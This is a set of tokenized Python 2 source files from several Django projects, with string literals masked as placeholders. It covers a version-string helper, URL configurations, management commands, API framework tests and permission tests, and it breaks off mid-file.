<s> import os <EOL> import time <EOL> import warnings <EOL> import subprocess <EOL> __version__ = ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> VERSION_STRING = '<STR_LIT:.>' . join ( str ( part ) for part in __version__ ) <EOL> VERBOSE = False <EOL> def _error ( msg ) : <EOL> if VERBOSE : <EOL> warnings . warn ( msg ) <EOL> return "<STR_LIT>" <EOL> def get_commit_timestamp ( path = None ) : <EOL> if path is None : <EOL> path = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> try : <EOL> process = subprocess . Popen ( <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> shell = False , cwd = path , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE , <EOL> ) <EOL> except Exception , err : <EOL> return _error ( "<STR_LIT>" % err ) <EOL> process . wait ( ) <EOL> returncode = process . returncode <EOL> if returncode != <NUM_LIT:0> : <EOL> return _error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( returncode , process . stdout . readline ( ) , process . stderr . readline ( ) ) <EOL> ) <EOL> output = process . stdout . readline ( ) . strip ( ) <EOL> try : <EOL> timestamp = int ( output ) <EOL> except Exception , err : <EOL> return _error ( "<STR_LIT>" % output ) <EOL> try : <EOL> return time . strftime ( "<STR_LIT>" , time . gmtime ( timestamp ) ) <EOL> except Exception , err : <EOL> return _error ( "<STR_LIT>" % ( timestamp , err ) ) <EOL> VERSION_STRING += get_commit_timestamp ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> print VERSION_STRING </s>
<s> import sys , os <EOL> sys . path . append ( os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , os . pardir ) ) ) <EOL> sys . path . append ( os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , os . pardir , os . pardir ) ) ) <EOL> import manage <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from systems import models <EOL> def main ( ) : <EOL> print '<STR_LIT>' <EOL> for sys in models . System . objects . all ( ) : <EOL> if sys . keyvalue_set . filter ( key = '<STR_LIT>' ) : <EOL> old_hostname = sys . keyvalue_set . filter ( key = '<STR_LIT>' ) [ <NUM_LIT:0> ] . value <EOL> else : <EOL> old_hostname = sys . hostname <EOL> if old_hostname != sys . hostname : <EOL> print '<STR_LIT>' % ( sys . id , old_hostname , sys . hostname ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from django . conf . urls . defaults import * <EOL> from django . core . urlresolvers import reverse <EOL> from django . shortcuts import redirect <EOL> from oncall . views import getoncall , oncall <EOL> from models import ServerModel <EOL> from misc . generic_views import create_object , gen_mod_dict <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , oncall ) , <EOL> url ( r'<STR_LIT>' , getoncall ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , create_object , gen_mod_dict ( ServerModel , '<STR_LIT>' ) , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = "<STR_LIT>" ) , <EOL> ) </s>
<s> import os <EOL> from django . core . management . base import CommandError , AppCommand <EOL> from django_extensions . management . utils import _make_writeable <EOL> from optparse import make_option <EOL> class Command ( AppCommand ) : <EOL> option_list = AppCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> make_option ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> ) <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args = "<STR_LIT>" <EOL> label = '<STR_LIT>' <EOL> requires_model_validation = False <EOL> can_import_settings = True <EOL> def handle_app ( self , app , ** options ) : <EOL> directory = os . getcwd ( ) <EOL> app_name = app . __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:2> ] <EOL> project_dir = os . path . join ( directory , app_name ) <EOL> if not os . path . exists ( project_dir ) : <EOL> try : <EOL> os . mkdir ( project_dir ) <EOL> except OSError , e : <EOL> raise CommandError ( e ) <EOL> copy_template ( '<STR_LIT>' , project_dir , options . get ( '<STR_LIT>' ) , '<STR_LIT>' % options . get ( '<STR_LIT>' ) ) <EOL> def copy_template ( template_name , copy_to , command_name , base_command ) : <EOL> """<STR_LIT>""" <EOL> import django_extensions <EOL> import re <EOL> import shutil <EOL> template_dir = os . path . join ( django_extensions . __path__ [ <NUM_LIT:0> ] , '<STR_LIT>' , template_name ) <EOL> handle_method = "<STR_LIT>" <EOL> if base_command == '<STR_LIT>' : <EOL> handle_method = "<STR_LIT>" <EOL> elif base_command == '<STR_LIT>' : <EOL> handle_method = "<STR_LIT>" <EOL> elif base_command == '<STR_LIT>' : <EOL> handle_method = "<STR_LIT>" <EOL> for d , subdirs , files in os . walk ( template_dir ) : <EOL> relative_dir = d [ len ( template_dir ) + <NUM_LIT:1> : ] <EOL> if relative_dir and not os . path . exists ( os . path . join ( copy_to , relative_dir ) ) : <EOL> os . mkdir ( os . path . join ( copy_to , relative_dir ) ) <EOL> for i , subdir in enumerate ( subdirs ) : <EOL> if subdir . startswith ( '<STR_LIT:.>' ) : <EOL> del subdirs [ i ] <EOL> for f in files : <EOL> if f . endswith ( '<STR_LIT>' ) or f . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> path_old = os . path . join ( d , f ) <EOL> path_new = os . path . join ( copy_to , relative_dir , f . replace ( '<STR_LIT>' , command_name ) ) <EOL> if os . path . exists ( path_new ) : <EOL> path_new = os . path . join ( copy_to , relative_dir , f ) <EOL> if os . path . exists ( path_new ) : <EOL> continue <EOL> path_new = path_new . rstrip ( "<STR_LIT>" ) <EOL> fp_old = open ( path_old , '<STR_LIT:r>' ) <EOL> fp_new = open ( path_new , '<STR_LIT:w>' ) <EOL> fp_new . write ( fp_old . read ( ) . replace ( '<STR_LIT>' , command_name ) . replace ( '<STR_LIT>' , base_command ) . replace ( '<STR_LIT>' , handle_method ) ) <EOL> fp_old . close ( ) <EOL> fp_new . close ( ) <EOL> try : <EOL> shutil . copymode ( path_old , path_new ) <EOL> _make_writeable ( path_new ) <EOL> except OSError : <EOL> sys . stderr . write ( style . NOTICE ( "<STR_LIT>" % path_new ) ) </s>
<s> from collections import defaultdict <EOL> import os <EOL> from django . conf import settings <EOL> from django . core . management . base import NoArgsCommand <EOL> from django . db import models <EOL> from django . db . models . loading import cache <EOL> class Command ( NoArgsCommand ) : <EOL> help = "<STR_LIT>" <EOL> def handle_noargs ( self , ** options ) : <EOL> if settings . MEDIA_ROOT == '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> return <EOL> media = [ ] <EOL> for root , dirs , files in os . walk ( settings . MEDIA_ROOT ) : <EOL> for f in files : <EOL> media . append ( os . path . abspath ( os . path . join ( root , f ) ) ) <EOL> model_dict = defaultdict ( list ) <EOL> for app in cache . get_apps ( ) : <EOL> model_list = cache . get_models ( app ) <EOL> for model in model_list : <EOL> for field in model . _meta . fields : <EOL> if issubclass ( field . __class__ , models . FileField ) : <EOL> model_dict [ model ] . append ( field ) <EOL> referenced = [ ] <EOL> for model in model_dict . iterkeys ( ) : <EOL> all = model . objects . all ( ) . iterator ( ) <EOL> for object in all : <EOL> for field in model_dict [ model ] : <EOL> target_file = getattr ( object , field . name ) <EOL> if target_file : <EOL> referenced . append ( os . path . abspath ( target_file . path ) ) <EOL> for m in media : <EOL> if m not in referenced : <EOL> print m </s>
<s> from django . conf import settings <EOL> from django . core . management import call_command <EOL> def main ( ) : <EOL> settings . configure ( <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> DATABASE_ENGINE = '<STR_LIT>' , <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } , <EOL> MEDIA_ROOT = '<STR_LIT>' , <EOL> MEDIA_PATH = '<STR_LIT>' , <EOL> ROOT_URLCONF = '<STR_LIT>' , <EOL> DEBUG = True , <EOL> TEMPLATE_DEBUG = True <EOL> ) <EOL> call_command ( '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from django . conf . urls . defaults import * <EOL> from piston . resource import Resource <EOL> from piston . authentication import HttpBasicAuthentication , HttpBasicSimple <EOL> from test_project . apps . testapp . handlers import EntryHandler , ExpressiveHandler , AbstractHandler , EchoHandler , PlainOldObjectHandler , Issue58Handler , ListFieldsHandler , FileUploadHandler , CircularAHandler <EOL> auth = HttpBasicAuthentication ( realm = '<STR_LIT>' ) <EOL> entries = Resource ( handler = EntryHandler , authentication = auth ) <EOL> expressive = Resource ( handler = ExpressiveHandler , authentication = auth ) <EOL> abstract = Resource ( handler = AbstractHandler , authentication = auth ) <EOL> echo = Resource ( handler = EchoHandler ) <EOL> popo = Resource ( handler = PlainOldObjectHandler ) <EOL> list_fields = Resource ( handler = ListFieldsHandler ) <EOL> issue58 = Resource ( handler = Issue58Handler ) <EOL> fileupload = Resource ( handler = FileUploadHandler ) <EOL> circular_a = Resource ( handler = CircularAHandler ) <EOL> AUTHENTICATORS = [ auth , ] <EOL> SIMPLE_USERS = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:user>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for username , password in SIMPLE_USERS : <EOL> AUTHENTICATORS . append ( HttpBasicSimple ( realm = '<STR_LIT>' , <EOL> username = username , password = password ) ) <EOL> multiauth = Resource ( handler = PlainOldObjectHandler , <EOL> authentication = AUTHENTICATORS ) <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , entries ) , <EOL> url ( r'<STR_LIT>' , entries ) , <EOL> url ( r'<STR_LIT>' , entries ) , <EOL> url ( r'<STR_LIT>' , entries ) , <EOL> url ( r'<STR_LIT>' , issue58 ) , <EOL> url ( r'<STR_LIT>' , expressive ) , <EOL> url ( r'<STR_LIT>' , abstract ) , <EOL> url ( r'<STR_LIT>' , abstract ) , <EOL> url ( r'<STR_LIT>' , echo ) , <EOL> url ( r'<STR_LIT>' , fileupload , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , multiauth ) , <EOL> url ( r'<STR_LIT>' , circular_a ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , list_fields ) , <EOL> url ( r'<STR_LIT>' , list_fields ) , <EOL> url ( r'<STR_LIT>' , popo ) , <EOL> ) </s>
<s> import mimeparse <EOL> def determine_format ( request , serializer , default_format = '<STR_LIT:application/json>' ) : <EOL> """<STR_LIT>""" <EOL> if request . GET . get ( '<STR_LIT>' ) : <EOL> if request . GET [ '<STR_LIT>' ] in serializer . formats : <EOL> return serializer . get_mime_for_format ( request . GET [ '<STR_LIT>' ] ) <EOL> if request . GET . has_key ( '<STR_LIT>' ) : <EOL> return serializer . get_mime_for_format ( '<STR_LIT>' ) <EOL> if request . META . get ( '<STR_LIT>' , '<STR_LIT>' ) != '<STR_LIT>' : <EOL> formats = list ( serializer . supported_formats ) or [ ] <EOL> formats . reverse ( ) <EOL> best_format = mimeparse . best_match ( formats , request . META [ '<STR_LIT>' ] ) <EOL> if best_format : <EOL> return best_format <EOL> return default_format <EOL> def build_content_type ( format , encoding = '<STR_LIT:utf-8>' ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in format : <EOL> return format <EOL> return "<STR_LIT>" % ( format , encoding ) </s>
<s> from django . contrib . auth . models import User <EOL> from django . http import HttpRequest <EOL> from django . test import TestCase <EOL> from tastypie . api import Api <EOL> from tastypie . exceptions import NotRegistered , BadRequest <EOL> from tastypie . resources import Resource , ModelResource <EOL> from core . models import Note <EOL> class NoteResource ( ModelResource ) : <EOL> class Meta : <EOL> resource_name = '<STR_LIT>' <EOL> queryset = Note . objects . filter ( is_active = True ) <EOL> class UserResource ( ModelResource ) : <EOL> class Meta : <EOL> resource_name = '<STR_LIT>' <EOL> queryset = User . objects . all ( ) <EOL> class ApiTestCase ( TestCase ) : <EOL> urls = '<STR_LIT>' <EOL> def test_register ( self ) : <EOL> api = Api ( ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:0> ) <EOL> api . register ( NoteResource ( ) ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' ] ) <EOL> api . register ( UserResource ( ) ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> api . register ( UserResource ( ) ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( api . _canonicals ) , <NUM_LIT:2> ) <EOL> api . register ( UserResource ( ) , canonical = False ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( api . _canonicals ) , <NUM_LIT:2> ) <EOL> def test_global_registry ( self ) : <EOL> api = Api ( ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:0> ) <EOL> api . register ( NoteResource ( ) ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' ] ) <EOL> api . register ( UserResource ( ) ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> api . register ( UserResource ( ) ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( api . _canonicals ) , <NUM_LIT:2> ) <EOL> api . register ( UserResource ( ) , canonical = False ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( api . _canonicals ) , <NUM_LIT:2> ) <EOL> def test_unregister ( self ) : <EOL> api = Api ( ) <EOL> api . register ( NoteResource ( ) ) <EOL> api . register ( UserResource ( ) , canonical = False ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( api . _canonicals ) , <NUM_LIT:1> ) <EOL> api . unregister ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( len ( api . _canonicals ) , <NUM_LIT:1> ) <EOL> api . unregister ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ ] ) <EOL> api . unregister ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( api . _registry ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( sorted ( api . _registry . keys ( ) ) , [ ] ) <EOL> def test_canonical_resource_for ( self ) : <EOL> api = Api ( ) <EOL> note_resource = NoteResource ( ) <EOL> user_resource = UserResource ( ) <EOL> api . register ( note_resource ) <EOL> api . register ( user_resource ) <EOL> self . assertEqual ( len ( api . _canonicals ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( isinstance ( api . canonical_resource_for ( '<STR_LIT>' ) , NoteResource ) , True ) <EOL> api_2 = Api ( ) <EOL> api . unregister ( user_resource . _meta . resource_name ) <EOL> self . assertRaises ( NotRegistered , api . canonical_resource_for , '<STR_LIT>' ) <EOL> def test_urls ( self ) : <EOL> api = Api ( ) <EOL> api . register ( NoteResource ( ) ) <EOL> api . register ( UserResource ( ) ) <EOL> patterns = api . urls <EOL> self . assertEqual ( len ( patterns ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( sorted ( [ pattern . name for pattern in patterns if hasattr ( pattern , '<STR_LIT:name>' ) ] ) , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ [ pattern . name for pattern in include . url_patterns if hasattr ( pattern , '<STR_LIT:name>' ) ] for include in patterns if hasattr ( include , '<STR_LIT>' ) ] , [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ] ) <EOL> api = Api ( api_name = '<STR_LIT>' ) <EOL> api . register ( NoteResource ( ) ) <EOL> api . register ( UserResource ( ) ) <EOL> patterns = api . urls <EOL> self . assertEqual ( len ( patterns ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( sorted ( [ pattern . name for pattern in patterns if hasattr ( pattern , '<STR_LIT:name>' ) ] ) , [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ [ pattern . name for pattern in include . url_patterns if hasattr ( pattern , '<STR_LIT:name>' ) ] for include in patterns if hasattr ( include , '<STR_LIT>' ) ] , [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ] ) <EOL> def test_top_level ( self ) : <EOL> api = Api ( ) <EOL> api . register ( NoteResource ( ) ) <EOL> api . register ( UserResource ( ) ) <EOL> request = HttpRequest ( ) <EOL> resp = api . top_level ( request ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( resp . content , '<STR_LIT>' ) <EOL> def test_top_level_jsonp ( self ) : <EOL> api = Api ( ) <EOL> api . register ( NoteResource ( ) ) <EOL> api . register ( UserResource ( ) ) <EOL> request = HttpRequest ( ) <EOL> request . META = { '<STR_LIT>' : '<STR_LIT>' } <EOL> request . GET = { '<STR_LIT>' : '<STR_LIT:foo>' } <EOL> resp = api . top_level ( request ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( resp [ '<STR_LIT>' ] . split ( '<STR_LIT:;>' ) [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( resp . content , '<STR_LIT>' ) <EOL> request = HttpRequest ( ) <EOL> request . META = { '<STR_LIT>' : '<STR_LIT>' } <EOL> request . GET = { '<STR_LIT>' : '<STR_LIT>' } <EOL> try : <EOL> resp = api . top_level ( request ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except BadRequest : <EOL> pass </s>
<s> import os <EOL> import sys <EOL> from os . path import abspath , dirname , join <EOL> from django . core . management import execute_manager <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> try : <EOL> import settings_related as settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> from django . conf import settings <EOL> from django . contrib . auth . models import Permission as DjangoPermission <EOL> from django . contrib . auth . models import Group <EOL> from django . test import TestCase <EOL> from django . contrib . contenttypes . models import ContentType <EOL> import authority <EOL> from authority import permissions <EOL> from authority . models import Permission <EOL> from authority . exceptions import NotAModel , UnsavedModelInstance <EOL> from authority . compat import get_user_model <EOL> from authority . forms import UserPermissionForm <EOL> from kitsune . users . tests import UserFactory <EOL> User = get_user_model ( ) <EOL> class UserPermission ( permissions . BasePermission ) : <EOL> checks = ( '<STR_LIT>' , ) <EOL> label = '<STR_LIT>' <EOL> authority . register ( User , UserPermission ) <EOL> class GroupPermission ( permissions . BasePermission ) : <EOL> checks = ( '<STR_LIT>' , ) <EOL> label = '<STR_LIT>' <EOL> authority . register ( Group , GroupPermission ) <EOL> class DjangoPermissionChecksTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_no_permission ( self ) : <EOL> self . assertFalse ( self . check . add_user ( ) ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertFalse ( self . check . delete_user ( self . user ) ) <EOL> def test_add ( self ) : <EOL> perm = DjangoPermission . objects . get ( codename = '<STR_LIT>' ) <EOL> self . user . user_permissions . add ( perm ) <EOL> self . assertTrue ( self . check . add_user ( ) ) <EOL> def test_delete ( self ) : <EOL> perm = Permission ( <EOL> user = self . user , <EOL> content_object = self . user , <EOL> codename = '<STR_LIT>' , <EOL> approved = True <EOL> ) <EOL> perm . save ( ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertTrue ( self . check . delete_user ( self . user ) ) <EOL> class AssignBehaviourTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_add ( self ) : <EOL> result = self . check . assign ( check = '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , DjangoPermission ) ) <EOL> self . assertTrue ( self . check . add_user ( ) ) <EOL> def test_delete ( self ) : <EOL> result = self . check . assign ( <EOL> content_object = self . user , <EOL> check = '<STR_LIT>' , <EOL> ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , Permission ) ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertTrue ( self . check . delete_user ( self . user ) ) <EOL> def test_all ( self ) : <EOL> result = self . check . assign ( content_object = self . user ) <EOL> self . assertTrue ( isinstance ( result , list ) ) <EOL> self . assertTrue ( self . check . browse_user ( self . user ) ) <EOL> self . assertTrue ( self . check . delete_user ( self . user ) ) <EOL> self . assertTrue ( self . check . add_user ( self . user ) ) <EOL> self . assertTrue ( self . check . change_user ( self . user ) ) <EOL> class GenericAssignBehaviourTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_add ( self ) : <EOL> result = self . check . assign ( check = '<STR_LIT>' , generic = True ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , DjangoPermission ) ) <EOL> self . assertTrue ( self . check . add_user ( ) ) <EOL> def test_delete ( self ) : <EOL> result = self . check . assign ( <EOL> content_object = self . user , <EOL> check = '<STR_LIT>' , <EOL> generic = True , <EOL> ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , Permission ) ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertTrue ( self . check . delete_user ( self . user ) ) <EOL> class AssignExceptionsTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_unsaved_model ( self ) : <EOL> try : <EOL> self . check . assign ( content_object = User ( ) ) <EOL> except UnsavedModelInstance : <EOL> return True <EOL> self . fail ( ) <EOL> def test_not_model_content_object ( self ) : <EOL> try : <EOL> self . check . assign ( content_object = '<STR_LIT>' ) <EOL> except NotAModel : <EOL> return True <EOL> self . fail ( ) <EOL> class SmartCachingTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . group = Group . objects . create ( ) <EOL> self . group . user_set . add ( self . user ) <EOL> self . user_check = UserPermission ( user = self . user ) <EOL> self . group_check = GroupPermission ( group = self . group ) <EOL> settings . AUTHORITY_USE_SMART_CACHE = True <EOL> def tearDown ( self ) : <EOL> ContentType . objects . clear_cache ( ) <EOL> def _old_user_permission_check ( self ) : <EOL> return Permission . objects . user_permissions ( <EOL> self . user , <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> def _old_group_permission_check ( self ) : <EOL> return Permission . objects . group_permissions ( <EOL> self . group , <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> approved = True , <EOL> ) <EOL> class PerformanceTest ( SmartCachingTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_has_user_perms ( self ) : <EOL> assert not self . user . is_superuser <EOL> assert self . user . is_active <EOL> with self . assertNumQueries ( <NUM_LIT:3> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> True , <EOL> False , <EOL> ) <EOL> def test_group_has_perms ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:2> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> True , <EOL> ) <EOL> def test_has_user_perms_check_group ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:3> ) : <EOL> self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> def test_invalidate_user_permissions_cache ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:6> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self 